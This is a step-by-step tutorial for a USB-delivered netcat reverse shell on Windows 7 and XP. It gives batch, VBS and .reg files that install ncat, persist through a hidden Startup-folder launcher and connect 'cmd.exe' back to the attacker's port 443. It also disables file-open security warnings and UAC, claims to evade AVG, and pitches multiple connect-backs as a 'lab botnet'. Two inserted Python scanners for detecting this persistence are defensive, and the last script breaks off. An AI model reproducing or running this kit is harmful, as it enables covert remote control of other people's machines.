control – netcat av bypass

Tested with BackTrack 5 R1 and Windows 7 Service Pack 1 with all updates. AV tested: AVG 2013 – nothing found.

This process automates installing netcat together with a script that tells netcat to connect back to your PC each time the user logs in. The Open File - Security Warning prompts that Windows would otherwise show are disabled via the created Disable_Open-File_Security_Warning.reg file.

You can place all of this onto a USB memory stick, making it a very portable solution. To work, you simply need access to the desired machine: insert the USB memory stick and click RunMe.bat.

Please only use this in your personal lab environment.
—————————————————–

1. Place a USB memory stick into your PC and create a new folder on it called ncat.
2. Open Notepad and create the .bat file: copy the text below down to and including the shutdown command.
Paste it into Notepad and Save As, select "All files", file name = RunMe.bat (the location is the USB stick's root directory, not the ncat folder).

NOTE – RunMe.bat lists several drive letters because Windows assigns the USB stick's drive letter dynamically. Every line is attempted; the ones for drive letters that are not the stick fail harmlessly and the script simply carries on.

—- Start copy below this line ——————

@echo off
robocopy "C:\ncat" "C:\ncat"
robocopy "D:\ncat" "C:\ncat"
robocopy "E:\ncat" "C:\ncat"
robocopy "F:\ncat" "C:\ncat"
robocopy "G:\ncat" "C:\ncat"
robocopy "H:\ncat" "C:\ncat"
robocopy "I:\ncat" "C:\ncat"
robocopy "J:\ncat" "C:\ncat"

copy "C:\ncat\VBS.vbs" "C:\Users\test\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VBS.vbs"
copy "D:\ncat\VBS.vbs" "C:\Users\test\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VBS.vbs"
copy "E:\ncat\VBS.vbs" "C:\Users\test\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VBS.vbs"
copy "F:\ncat\VBS.vbs" "C:\Users\test\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VBS.vbs"
copy "G:\ncat\VBS.vbs" "C:\Users\test\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VBS.vbs"
copy "H:\ncat\VBS.vbs" "C:\Users\test\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VBS.vbs"
copy "I:\ncat\VBS.vbs" "C:\Users\test\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VBS.vbs"
copy "J:\ncat\VBS.vbs" "C:\Users\test\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VBS.vbs"

regedit /s C:\ncat\Disable_Open-File_Security_Warning.reg
regedit /s D:\ncat\Disable_Open-File_Security_Warning.reg
regedit /s E:\ncat\Disable_Open-File_Security_Warning.reg
regedit /s F:\ncat\Disable_Open-File_Security_Warning.reg
regedit /s G:\ncat\Disable_Open-File_Security_Warning.reg
regedit /s H:\ncat\Disable_Open-File_Security_Warning.reg
regedit /s I:\ncat\Disable_Open-File_Security_Warning.reg
regedit /s J:\ncat\Disable_Open-File_Security_Warning.reg

shutdown -r -t 0

—- Dont copy this line ——————

The batch file RunMe.bat performs the actions below:

+ Copies the ncat folder on your USB stick to the host's C:\
+ Copies the VBS.vbs script from the USB stick to the host's C:\Users\test\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
+ Imports the Disable_Open-File_Security_Warning.reg file
+ Reboots the host machine.

————————————————————

3. Create the .reg file by opening Notepad again. Copy the text below, then Save As with "All files" and the name Disable_Open-File_Security_Warning.reg.
Note – Save it into the ncat folder on your USB stick.

—- Start copy below this line ——————

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments]
"SaveZoneInformation"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations]
"LowRiskFileTypes"=".avi;.bat;.com;.cmd;.exe;.htm;.html;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments]
"SaveZoneInformation"=-

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations]
"LowRiskFileTypes"=-

—- Dont copy this line ——————

4. Create the .bat file that will tell ncat to dial back to your remote machine on port 443. Note that 443 only borrows the HTTPS port number so the connection blends in with web traffic; neither this command nor the plain nc listener in step 10 encrypts the session.

Note – change Your-IP-Address to your own address, for example 192.168.1.2
Note 2 – Place the saved .bat into the ncat folder on your USB stick.

Copy the line below into a new Notepad window and Save As, all files, with the name nc.bat

—- Start copy below this line ——————

C:\ncat\ncat.exe -v Your-IP-Address 443 -e cmd.exe

—- Don’t copy this line ——————

5. Create the .vbs file. This tells the PC to run nc.bat silently (window style 0 in the Run call), so no CMD window opens.

Note – Place the saved .vbs into the ncat folder on your USB stick.

Copy the lines below into a new Notepad window and Save As, all files, with the name VBS.vbs

—- Start copy below this line ——————

' Launch nc.bat with window style 0 (hidden), so no console window is shown
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run Chr(34) & "C:\ncat\nc.bat" & Chr(34), 0
Set WshShell = Nothing

—- Don’t copy this line ——————

6. Your ncat folder on the USB stick should now contain the following files.

+ Disable_Open-File_Security_Warning.reg
+ nc.bat
+ VBS.vbs

7. Download nmap-6.01-setup.exe for Windows from http://nmap.org/download.html
8. Install nmap on your own Windows machine and locate its program folder, normally C:\Program Files\Nmap
9. Copy the following files, ssleay32.dll, ncat.exe and libeay32.dll, and paste them into the ncat folder you created on your USB stick.

Your ncat folder on the USB stick should now contain the following files.

+ Disable_Open-File_Security_Warning.reg
+ nc.bat
+ VBS.vbs
+ ssleay32.dll
+ ncat.exe
+ libeay32.dll

And the USB stick's root directory should contain your RunMe.bat file.

——————————————

10. On BackTrack, start your nc listener:

root@bt:~# nc -lvvp 443
listening on [any] 443 ...

——————————————

11. Now try it: find an unlocked Windows 7 machine, insert your USB stick and double click RunMe.bat.

+ This copies the ncat folder to the host's C:\ directory.
+ Copies VBS.vbs to C:\Users\test\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
+ Imports the Disable_Open-File_Security_Warning.reg file

Now every time the user logs in, ncat will create a connection to your host.
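The Startup-folder persistence just described is also the first thing a defender looks for. The following is an added example (Python; not code from the original post) that walks the per-user and all-users Startup folders and reports script files that call WScript.Shell.Run with window style 0, as VBS.vbs does. The folder layout it assumes is the Vista-and-later one built from %APPDATA% and %PROGRAMDATA%; the sample Startup folder, the helper.vbs contents and the readme.txt are constructed for the demonstration, and the function names are this example's own.

```python
"""Scan Windows Startup folders for hidden-window script launchers.

Added example, not part of the original post. VBS.vbs above persists by
sitting in a Startup folder and calling WScript.Shell.Run with window
style 0, so nothing is shown at logon. This scanner walks the per-user and
all-users Startup folders (or any folders you pass in) and reports script
files using that pattern, plus any other launchable file found there. The
sample Startup folder is constructed in a temporary directory; the VBS text
in it is the one from the post.
"""
import os
import re
import tempfile
from pathlib import Path
from typing import Dict, Iterable, List, Optional

LAUNCHABLE = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".bat", ".cmd", ".ps1", ".exe", ".lnk"}
WSH_SCRIPTS = {".vbs", ".vbe", ".js", ".jse", ".wsf"}

WSH_SHELL = re.compile(r'CreateObject\s*\(\s*"WScript\.Shell"\s*\)', re.IGNORECASE)
# .Run <rest of line>, 0   -> intWindowStyle 0 = hidden window
HIDDEN_RUN = re.compile(r"\.Run\b[^\n]*?,\s*0\b", re.IGNORECASE)
# the first quoted string after .Run is normally the command being launched
RUN_TARGET = re.compile(r'\.Run\b[^"\n]*"([^"\n]+)"', re.IGNORECASE)


def default_startup_folders() -> List[Path]:
    """Vista+ layout, derived from %APPDATA% and %PROGRAMDATA% (empty off Windows)."""
    tail = Path("Microsoft") / "Windows" / "Start Menu" / "Programs" / "Startup"
    bases = [os.environ.get("APPDATA"), os.environ.get("PROGRAMDATA")]
    return [Path(b) / tail for b in bases if b]


def inspect_script(text: str) -> Optional[str]:
    """Return the launched command if the script does a hidden WScript.Shell.Run."""
    if WSH_SHELL.search(text) and HIDDEN_RUN.search(text):
        m = RUN_TARGET.search(text)
        return m.group(1) if m else "<unparsed target>"
    return None


def scan_startup(folders: Iterable[Path]) -> List[Dict[str, str]]:
    """One finding per launchable file; hidden WSH launchers are called out."""
    findings: List[Dict[str, str]] = []
    for folder in folders:
        folder = Path(folder)
        if not folder.is_dir():
            continue
        for p in sorted(folder.iterdir(), key=lambda q: q.name.lower()):
            ext = p.suffix.lower()
            if not p.is_file() or ext not in LAUNCHABLE:
                continue
            reason = f"{ext} file in Startup folder"
            target = ""
            if ext in WSH_SCRIPTS:
                hidden = inspect_script(p.read_text(errors="replace"))
                if hidden is not None:
                    reason = "WScript.Shell.Run with window style 0 (hidden launch)"
                    target = hidden
            findings.append({"path": str(p), "reason": reason, "launches": target})
    return findings


def build_sample_startup() -> Path:
    """Constructed Startup folder: the post's VBS.vbs, a visible-window script, a text file."""
    folder = Path(tempfile.mkdtemp(prefix="startup_"))
    (folder / "VBS.vbs").write_text(
        'Set WshShell = CreateObject("WScript.Shell" )\n'
        'WshShell.Run chr(34) & "C:\\ncat\\nc.bat" & Chr(34), 0\n'
        "Set WshShell = Nothing\n")
    (folder / "helper.vbs").write_text(
        'Set sh = CreateObject("WScript.Shell")\nsh.Run "notepad.exe", 1\n')
    (folder / "readme.txt").write_text("not a launcher\n")
    return folder


if __name__ == "__main__":
    for f in scan_startup(default_startup_folders() + [build_sample_startup()]):
        print(f)
```

Run it as the user whose Startup folder you want to check; the all-users folder under %PROGRAMDATA% is the one the later :Win7 menu option writes to. A visible-window script (helper.vbs) is still listed, just without the hidden-launch reason, because anything launchable in a Startup folder deserves a look.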

12. What you should see:

root@bt:~# nc -lvvp 443
listening on [any] 443 ...
Remote-IP-Address: inverse host lookup failed: Unknown server error : Connection timed out
connect to [Local-IP-Address] from (UNKNOWN) [Remote-IP-Address] 49160
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>

————————————————————

If RunMe.bat fails, you can manually move the required files as listed below.

1. Move ncat folder to C:\
2. Run Disable_Open-File_Security_Warning reg hack
3. Move VBS script to C:\Users\test\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
4. Reboot the machine.

————————————————————

The following is not required, but some may want to restore the registry afterwards.

Reg file to re-enable the Open File Security Warning (so you can undo the changes made by running Disable_Open-File_Security_Warning.reg):

1. Open Notepad.
2. Copy the text below, then Save As with "All files" and the name Enable_Open-File_Security_Warning.reg

—- Start copy below this line ——————

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments]
"SaveZoneInformation"=-

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations]
"LowRiskFileTypes"=-

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments]
"SaveZoneInformation"=-

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations]
"LowRiskFileTypes"=-

—- Don’t copy this line ——————
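Both the Disable_ file in step 3 and the Enable_ file just above are plain text in the "Windows Registry Editor Version 5.00" format, so an administrator can audit such a file (or an export of these keys from a suspect machine) before importing it. The following is an added example, not from the original post: a small Python parser for that format plus an audit that reports the values that switch off the Open File - Security Warning (SaveZoneInformation=1, executable extensions in LowRiskFileTypes) or UAC (EnableLUA=0, which the :uac menu option later in the post sets). The two embedded .reg texts are copied from the post; the function names and the list of code extensions are this example's own choices.

```python
"""Audit an exported .reg file for the Attachment Manager and UAC settings
the Disable_/Enable_Open-File_Security_Warning.reg files above change.

Added example, not part of the original post. It parses the
"Windows Registry Editor Version 5.00" text format and reports the values
that would suppress the "Open File - Security Warning" prompt or switch UAC
off. The two sample .reg texts are copied from the post; everything else is
assumed for illustration.
"""
import re
from typing import Dict, List, Optional

# key path -> {value name: raw value}; a raw value of "-" is a deletion.
RegData = Dict[str, Dict[str, str]]

# Extensions that execute code; listing them as "low risk" removes the prompt.
CODE_EXTS = {".bat", ".cmd", ".com", ".exe", ".msi", ".reg", ".vbs", ".js", ".wsf"}


def parse_reg(text: str) -> RegData:
    """Parse [Key] headers and "Name"=value lines; skips the banner and comments."""
    data: RegData = {}
    section: Optional[str] = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Windows Registry Editor") or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
            data.setdefault(section, {})
            continue
        m = re.match(r'^"([^"]+)"=(.*)$', line)
        if m and section is not None:
            name, value = m.group(1), m.group(2).strip()
            if len(value) >= 2 and value[0] == '"' and value[-1] == '"':
                value = value[1:-1]  # REG_SZ literal: drop the surrounding quotes
            data[section][name] = value  # "-" is kept as the delete marker
    return data


def dword(value: str) -> Optional[int]:
    """Decode a dword:XXXXXXXX literal; None for deletions or other types."""
    m = re.fullmatch(r"dword:([0-9a-fA-F]{8})", value)
    return int(m.group(1), 16) if m else None


def audit(data: RegData) -> List[str]:
    """Return one finding per value that weakens the attachment prompt or UAC."""
    findings: List[str] = []
    for key, values in data.items():
        k = key.lower()
        if k.endswith(r"\policies\attachments"):
            v = values.get("SaveZoneInformation")
            if v is not None and dword(v) == 1:
                findings.append(f"{key}: SaveZoneInformation=1 stops the zone identifier "
                                "being written, so files arrive without a warning")
        elif k.endswith(r"\policies\associations"):
            v = values.get("LowRiskFileTypes")
            if v is not None and v != "-":
                exts = {e.strip().lower() for e in v.split(";") if e.strip()}
                risky = sorted(exts & CODE_EXTS)
                if risky:
                    findings.append(f"{key}: LowRiskFileTypes marks executable types "
                                    f"{', '.join(risky)} as low risk (no prompt)")
        elif k.endswith(r"\policies\system"):
            v = values.get("EnableLUA")
            if v is not None and dword(v) == 0:
                findings.append(f"{key}: EnableLUA=0 turns UAC off")
    return findings


# Copied from the post: the file that disables the warning ...
DISABLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments]
"SaveZoneInformation"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations]
"LowRiskFileTypes"=".avi;.bat;.com;.cmd;.exe;.htm;.html;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments]
"SaveZoneInformation"=-

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations]
"LowRiskFileTypes"=-
"""

# ... and the one that puts the defaults back (every value deleted).
ENABLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments]
"SaveZoneInformation"=-

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations]
"LowRiskFileTypes"=-

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments]
"SaveZoneInformation"=-

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations]
"LowRiskFileTypes"=-
"""

if __name__ == "__main__":
    for label, text in (("Disable", DISABLE_REG), ("Enable", ENABLE_REG)):
        print(label, audit(parse_reg(text)) or ["no weakening found"])
```

The HKLM lines ending in =- in the Disable_ file delete any machine-wide policy value, which would otherwise take precedence over the per-user one; the audit only flags weakening values, so a file that merely deletes entries (the Enable_ file) reports nothing.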

Notes

1. Tried against a fully patched, brand new Windows 7 build with UAC turned on. The script worked, but netcat requested MSVCR100.dll.
Once it was added to the ncat folder it worked.

2. Had a problem with the robocopy "D:\ncat" "C:\ncat" line (the error said it was waiting 30 seconds to retry). Found the issue was that there was a CD in the D: drive and it tried to access it.
Fix: delete any potential drive letters that may be used for CDs or DVDs. Or, before running the script, open all CD drives?

3. New .bat file idea for a menu to deliver different exploits. Work in progress, but the menu is working!

—- Start copy below this line ——————

@ECHO OFF
CLS
:MENU

ECHO.
ECHO ...............................................
ECHO.
ECHO MyExploit Presents
ECHO.
ECHO PRESS 1, 2 OR 3 to select your Exploit, or 4 to EXIT.
ECHO.
ECHO ...............................................
ECHO.
ECHO 1 - Open Notepad
ECHO 2 - Open Calculator
ECHO 3 - Open MS-Paint
ECHO 4 - EXIT
ECHO.

SET /P M=Type 1, 2, 3, or 4 then press ENTER:
REM Quoting both sides keeps the IF valid when nothing was typed
IF "%M%"=="1" GOTO NOTE
IF "%M%"=="2" GOTO CALC
IF "%M%"=="3" GOTO MSPaint
IF "%M%"=="4" GOTO :EOF
REM Anything else: redraw the menu instead of falling through into :NOTE
GOTO MENU

:NOTE
REM cd takes a folder, not the .exe path
cd /d %windir%\system32
start notepad.exe
GOTO MENU

:CALC
cd /d %windir%\system32
start calc.exe
GOTO MENU

:MSPaint
cd /d %windir%\system32
start mspaint.exe
GOTO MENU

—- Don’t copy this line ——————

Update

—- Start copy below this line ——————

@ECHO OFF
CLS
:MENU

ECHO.
ECHO ...............................................
ECHO.
ECHO MyExploit Presents
ECHO.
ECHO PRESS 1 - 4 to select your Exploit, or 5 to EXIT.
ECHO.
ECHO ...............................................
ECHO.
ECHO 1 - Run Win7 Exploit
ECHO 2 - Open Calculator
ECHO 3 - Run Winxp Exploit
ECHO 4 - Reboot
ECHO 5 - EXIT
ECHO.

SET /P M=Type 1, 2, 3, 4 or 5 then press ENTER:
REM Quoting both sides keeps the IF valid when nothing was typed
IF "%M%"=="1" GOTO Win7
IF "%M%"=="2" GOTO CALC
IF "%M%"=="3" GOTO winxp
IF "%M%"=="4" GOTO reboot
IF "%M%"=="5" GOTO :EOF
REM Unrecognised input: redraw the menu rather than fall through into :Win7
GOTO MENU

:Win7
@echo off
robocopy "C:\Users\test\Desktop\Exploit1\ncat" "C:\ncat"

robocopy "E:\Users\test\Desktop\Exploit1\ncat" "C:\ncat"
robocopy "F:\Users\test\Desktop\Exploit1\ncat" "C:\ncat"
robocopy "G:\Users\test\Desktop\Exploit1\ncat" "C:\ncat"
robocopy "H:\Users\test\Desktop\Exploit1\ncat" "C:\ncat"
robocopy "I:\Users\test\Desktop\Exploit1\ncat" "C:\ncat"
robocopy "J:\Users\test\Desktop\Exploit1\ncat" "C:\ncat"

copy "C:\Users\test\Desktop\Exploit1\ncat\VBS.vbs" "C:\Users\test\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VBS.vbs"
copy "D:\Users\test\Desktop\Exploit1\ncat\VBS.vbs" "C:\Users\test\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VBS.vbs"
copy "E:\Users\test\Desktop\Exploit1\ncat\VBS.vbs" "C:\Users\test\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VBS.vbs"
copy "F:\Users\test\Desktop\Exploit1\ncat\VBS.vbs" "C:\Users\test\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VBS.vbs"
copy "G:\Users\test\Desktop\Exploit1\ncat\VBS.vbs" "C:\Users\test\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VBS.vbs"
copy "H:\Users\test\Desktop\Exploit1\ncat\VBS.vbs" "C:\Users\test\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VBS.vbs"
copy "I:\Users\test\Desktop\Exploit1\ncat\VBS.vbs" "C:\Users\test\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VBS.vbs"
copy "J:\Users\test\Desktop\Exploit1\ncat\VBS.vbs" "C:\Users\test\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VBS.vbs"

regedit /s C:\Users\test\Desktop\Exploit1\ncat\Disable_Open-File_Security_Warning.reg
regedit /s D:\Users\test\Desktop\Exploit1\ncat\Disable_Open-File_Security_Warning.reg
regedit /s E:\Users\test\Desktop\Exploit1\ncat\Disable_Open-File_Security_Warning.reg
regedit /s F:\Users\test\Desktop\Exploit1\ncat\Disable_Open-File_Security_Warning.reg
regedit /s G:\Users\test\Desktop\Exploit1\ncat\Disable_Open-File_Security_Warning.reg
regedit /s H:\Users\test\Desktop\Exploit1\ncat\Disable_Open-File_Security_Warning.reg
regedit /s I:\Users\test\Desktop\Exploit1\ncat\Disable_Open-File_Security_Warning.reg
regedit /s J:\Users\test\Desktop\Exploit1\ncat\Disable_Open-File_Security_Warning.reg
GOTO MENU

:winxp
@echo off
echo d | xcopy "C:\Documents and Settings\11\Desktop\Exploit2\ncat" "C:\ncat"
echo d | xcopy "E:\Documents and Settings\11\Desktop\Exploit2\ncat" "C:\ncat"
echo d | xcopy "F:\Documents and Settings\11\Desktop\Exploit2\ncat" "C:\ncat"
echo d | xcopy "G:\Documents and Settings\11\Desktop\Exploit2\ncat" "C:\ncat"
echo d | xcopy "H:\Documents and Settings\11\Desktop\Exploit2\ncat" "C:\ncat"
echo d | xcopy "I:\Documents and Settings\11\Desktop\Exploit2\ncat" "C:\ncat"
echo d | xcopy "J:\Documents and Settings\11\Desktop\Exploit2\ncat" "C:\ncat"

copy "C:\Documents and Settings\11\Desktop\Exploit2\ncat\VBS.vbs" "C:\Documents and Settings\11\Start Menu\Programs\Startup\VBS.vbs"
copy "E:\Documents and Settings\11\Desktop\Exploit2\ncat\VBS.vbs" "C:\Documents and Settings\11\Start Menu\Programs\Startup\VBS.vbs"
copy "F:\Documents and Settings\11\Desktop\Exploit2\ncat\VBS.vbs" "C:\Documents and Settings\11\Start Menu\Programs\Startup\VBS.vbs"
copy "G:\Documents and Settings\11\Desktop\Exploit2\ncat\VBS.vbs" "C:\Documents and Settings\11\Start Menu\Programs\Startup\VBS.vbs"
copy "H:\Documents and Settings\11\Desktop\Exploit2\ncat\VBS.vbs" "C:\Documents and Settings\11\Start Menu\Programs\Startup\VBS.vbs"
copy "I:\Documents and Settings\11\Desktop\Exploit2\ncat\VBS.vbs" "C:\Documents and Settings\11\Start Menu\Programs\Startup\VBS.vbs"
copy "J:\Documents and Settings\11\Desktop\Exploit2\ncat\VBS.vbs" "C:\Documents and Settings\11\Start Menu\Programs\Startup\VBS.vbs"

REM The path must be quoted because of the spaces in "Documents and Settings"
regedit /s "C:\Documents and Settings\11\Desktop\Exploit2\ncat\Disable_Open-File_Security_Warning.reg"
regedit /s "E:\Documents and Settings\11\Desktop\Exploit2\ncat\Disable_Open-File_Security_Warning.reg"
regedit /s "F:\Documents and Settings\11\Desktop\Exploit2\ncat\Disable_Open-File_Security_Warning.reg"
regedit /s "G:\Documents and Settings\11\Desktop\Exploit2\ncat\Disable_Open-File_Security_Warning.reg"
regedit /s "H:\Documents and Settings\11\Desktop\Exploit2\ncat\Disable_Open-File_Security_Warning.reg"
regedit /s "I:\Documents and Settings\11\Desktop\Exploit2\ncat\Disable_Open-File_Security_Warning.reg"
regedit /s "J:\Documents and Settings\11\Desktop\Exploit2\ncat\Disable_Open-File_Security_Warning.reg"
GOTO MENU

:CALC
REM cd takes a folder, not the .exe path
cd /d %windir%\system32
start calc.exe
GOTO MENU

:reboot
shutdown -r -t 0

—- Don’t copy this line ——————

Lab botnet idea: it is possible to have multiple machines connect back. Just open more terminals and in each one run

root@bt:~# nc -lvvp 443

Below, two machines connecting back at once: one Windows 7, the other Windows XP, both with AVG AV on them.

C:\Windows\system32>ver
ver

Microsoft Windows [Version 6.1.7600]

C:\Windows\system32>systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
OS Name: Microsoft Windows 7 Professional
OS Version: 6.1.7600 N/A Build 7600

——————————————

C:\Documents and Settings\Test-PC>ver
ver

Microsoft Windows XP [Version 5.1.2600]

C:\Documents and Settings\Test-PC>systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
OS Name: Microsoft Windows XP Professional
OS Version: 5.1.2600 Service Pack 3 Build 2600

——————– Update —————-

@ECHO OFF
CLS
:MENU

ECHO.
ECHO ...............................................
ECHO.
ECHO MyExploit Presents
ECHO.
ECHO PRESS 1 - 5 or 9 to select an option, or 10 to EXIT.
ECHO.
ECHO ...............................................
ECHO.
ECHO 1 - Run Win7 Exploit.
ECHO 2 - Run Winxp Exploit.
ECHO 3 - Disable Win7 user warnings. Not the UAC warnings!
ECHO 4 - Disable Win7 UAC. You need to run this option twice.
ECHO 5 - Enable Win7 UAC. You need to run this option twice.
ECHO 9 - Reboot.
ECHO 10 - EXIT
ECHO.

SET /P M=Type 1, 2, 3, 4, 5, 9 or 10 then press ENTER:
REM Quoting both sides keeps the IF valid when nothing was typed
IF "%M%"=="1" GOTO Win7
IF "%M%"=="2" GOTO winxp
IF "%M%"=="3" GOTO warnings
IF "%M%"=="4" GOTO uac
IF "%M%"=="5" GOTO uac-on
IF "%M%"=="9" GOTO reboot
IF "%M%"=="10" GOTO :EOF
REM Unrecognised input: redraw the menu rather than fall through into :Win7
GOTO MENU

:Win7
@echo off

:: BatchGotAdmin elevate rights!
:: Labels must be unique within one batch file (GOTO always jumps to the
:: first match), so this section uses its own UACPrompt7/gotAdmin7 labels.
:-------------------------------------
REM --> Check for permissions
>nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system"

REM --> If error flag set, we do not have admin.
if '%errorlevel%' NEQ '0' (
echo Requesting administrative privileges...
goto UACPrompt7
) else ( goto gotAdmin7 )

:UACPrompt7
echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%\getadmin.vbs"
echo UAC.ShellExecute "%~s0", "", "", "runas", 1 >> "%temp%\getadmin.vbs"

REM Relaunches this script elevated from the top, which is why the option must be chosen twice
"%temp%\getadmin.vbs"
exit /B

:gotAdmin7
if exist "%temp%\getadmin.vbs" ( del "%temp%\getadmin.vbs" )
pushd "%CD%"
CD /D "%~dp0"
:--------------------------------------

@echo off
robocopy "C:\Users\test\Desktop\Exploit1\ncat" "C:\ncat"

robocopy "E:\Users\test\Desktop\Exploit1\ncat" "C:\ncat"
robocopy "F:\Users\test\Desktop\Exploit1\ncat" "C:\ncat"
robocopy "G:\Users\test\Desktop\Exploit1\ncat" "C:\ncat"
robocopy "H:\Users\test\Desktop\Exploit1\ncat" "C:\ncat"
robocopy "I:\Users\test\Desktop\Exploit1\ncat" "C:\ncat"
robocopy "J:\Users\test\Desktop\Exploit1\ncat" "C:\ncat"

copy "C:\Users\test\Desktop\Exploit1\ncat\VBS.vbs" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\VBS.vbs"
copy "D:\Users\test\Desktop\Exploit1\ncat\VBS.vbs" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\VBS.vbs"
copy "E:\Users\test\Desktop\Exploit1\ncat\VBS.vbs" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\VBS.vbs"
copy "F:\Users\test\Desktop\Exploit1\ncat\VBS.vbs" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\VBS.vbs"
copy "G:\Users\test\Desktop\Exploit1\ncat\VBS.vbs" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\VBS.vbs"
copy "H:\Users\test\Desktop\Exploit1\ncat\VBS.vbs" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\VBS.vbs"
copy "I:\Users\test\Desktop\Exploit1\ncat\VBS.vbs" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\VBS.vbs"
copy "J:\Users\test\Desktop\Exploit1\ncat\VBS.vbs" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\VBS.vbs"
ECHO.
GOTO MENU

:uac
@echo off

:: BatchGotAdmin elevate rights!
:: Own copy of the labels (UACPromptOff/gotAdminOff): duplicate label names
:: in one batch file all resolve to the first occurrence.
:-------------------------------------
REM --> Check for permissions
>nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system"

REM --> If error flag set, we do not have admin.
if '%errorlevel%' NEQ '0' (
echo Requesting administrative privileges...
goto UACPromptOff
) else ( goto gotAdminOff )

:UACPromptOff
echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%\getadmin.vbs"
echo UAC.ShellExecute "%~s0", "", "", "runas", 1 >> "%temp%\getadmin.vbs"

"%temp%\getadmin.vbs"
exit /B

:gotAdminOff
if exist "%temp%\getadmin.vbs" ( del "%temp%\getadmin.vbs" )
pushd "%CD%"
CD /D "%~dp0"
:--------------------------------------
REM Run reg.exe directly; cmd /k would leave an interactive prompt open and block the menu
%windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
ECHO.
GOTO MENU

:uac-on
@echo off

:: BatchGotAdmin elevate rights!
:: Own copy of the labels (UACPromptOn/gotAdminOn): duplicate label names
:: in one batch file all resolve to the first occurrence.
:-------------------------------------
REM --> Check for permissions
>nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system"

REM --> If error flag set, we do not have admin.
if '%errorlevel%' NEQ '0' (
echo Requesting administrative privileges...
goto UACPromptOn
) else ( goto gotAdminOn )

:UACPromptOn
echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%\getadmin.vbs"
echo UAC.ShellExecute "%~s0", "", "", "runas", 1 >> "%temp%\getadmin.vbs"

"%temp%\getadmin.vbs"
exit /B

:gotAdminOn
if exist "%temp%\getadmin.vbs" ( del "%temp%\getadmin.vbs" )
pushd "%CD%"
CD /D "%~dp0"
:--------------------------------------
REM Run reg.exe directly; cmd /k would leave an interactive prompt open and block the menu
